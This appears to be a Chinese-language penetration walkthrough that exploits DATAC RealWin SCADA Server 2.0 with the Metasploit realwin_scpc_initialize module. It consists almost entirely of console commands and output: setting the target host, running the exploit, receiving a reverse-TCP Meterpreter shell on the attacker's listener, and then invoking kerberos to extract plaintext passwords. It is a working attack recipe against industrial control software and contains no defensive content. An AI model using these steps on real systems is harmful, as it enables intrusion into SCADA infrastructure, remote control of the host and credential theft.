前言
使用Metasploit对DATAC RealWin SCADA Server 2.0进行渗透
攻击
msf6 > use exploit/windows/scada/realwin_scpc_initialize
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/realwin_scpc_initialize) > options
Module options (exploit/windows/scada/realwin_scpc_initialize):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 912 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(windows/scada/realwin_scpc_initialize) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/scada/realwin_scpc_initialize) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1622) at 2021-05-10 21:08:49 +0800
[*] Sending stage (175174 bytes) to 192.168.1.115
获得meterpreter权限后使用kerberos获取明文密码
meterpreter > kerberos